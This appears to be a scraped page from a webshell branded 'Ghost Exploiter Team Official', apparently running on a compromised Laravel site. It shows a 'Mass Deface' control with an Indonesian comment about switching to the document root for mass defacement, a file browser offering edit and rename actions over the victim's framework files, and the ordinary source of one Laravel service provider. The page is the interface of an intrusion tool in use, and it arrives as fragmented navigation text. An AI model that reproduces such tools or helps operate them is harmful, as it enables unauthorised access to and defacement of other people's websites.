webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Translation
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
lang
--
ren
ArrayLoader.php
1.577KB
edt
ren
CreatesPotentiallyTrans
...
1.602KB
edt
ren
FileLoader.php
5.041KB
edt
ren
LICENSE.md
1.05KB
edt
ren
MessageSelector.php
11.397KB
edt
ren
PotentiallyTranslatedSt
...
2.022KB
edt
ren
TranslationServiceProvi
...
1.42KB
edt
ren
Translator.php
14.536KB
edt
ren
composer.json
0.937KB
edt
ren
<?php namespace Illuminate\Translation; use Illuminate\Contracts\Support\DeferrableProvider; use Illuminate\Support\ServiceProvider; class TranslationServiceProvider extends ServiceProvider implements DeferrableProvider { /** * Register the service provider. * * @return void */ public function register() { $this->registerLoader(); $this->app->singleton('translator', function ($app) { $loader = $app['translation.loader']; // When registering the translator component, we'll need to set the default // locale as well as the fallback locale. So, we'll grab the application // configuration so we can easily get both of these values from there. $locale = $app->getLocale(); $trans = new Translator($loader, $locale); $trans->setFallback($app->getFallbackLocale()); return $trans; }); } /** * Register the translation line loader. * * @return void */ protected function registerLoader() { $this->app->singleton('translation.loader', function ($app) { return new FileLoader($app['files'], [__DIR__.'/lang', $app['path.lang']]); }); } /** * Get the services provided by the provider. * * @return array */ public function provides() { return ['translator', 'translation.loader']; } }
<=Back
Liking